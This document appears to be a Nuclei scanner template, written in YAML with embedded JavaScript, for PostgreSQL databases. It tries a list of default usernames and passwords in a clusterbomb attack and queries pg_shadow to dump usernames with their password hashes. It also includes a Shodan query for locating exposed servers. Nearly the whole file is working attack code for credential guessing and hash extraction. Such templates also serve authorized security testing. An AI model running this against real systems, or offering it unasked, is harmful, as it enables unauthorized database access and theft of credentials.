id: pgsql-list-password-hashes info: name: PostgreSQL List Password Hashes author: pussycat0x severity: high description: | Dump password hashes in use within a PostgreSQL database. reference: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256 - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/postgres/postgres_hashdump.md metadata: verified: true max-request: 8 shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,authenticated,enum javascript: - pre-condition: | isPortOpen(Host,Port); code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename, passwd FROM pg_shadow"); Export(connected) args: Host: "{{Host}}" Port: 5432 User: "{{usernames}}" Pass: "{{password}}" Db: "{{database}}" payloads: usernames: - postgres - admin password: - postgres - - 123 - amber database: - postgres attack: clusterbomb extractors: - type: json json: - '.Rows[] | "\(.usename) : \(.passwd)"' # digest: 4b0a00483046022100eadfce2997111bfea81cb5e320364402b711a35bffcf2da9e7698419a2d02932022100984ef022c43f4883f758a43178f6817e3fb6ec4df6b91f59bb037aad300028d8:922c64590222798bb761d5b6d8e72950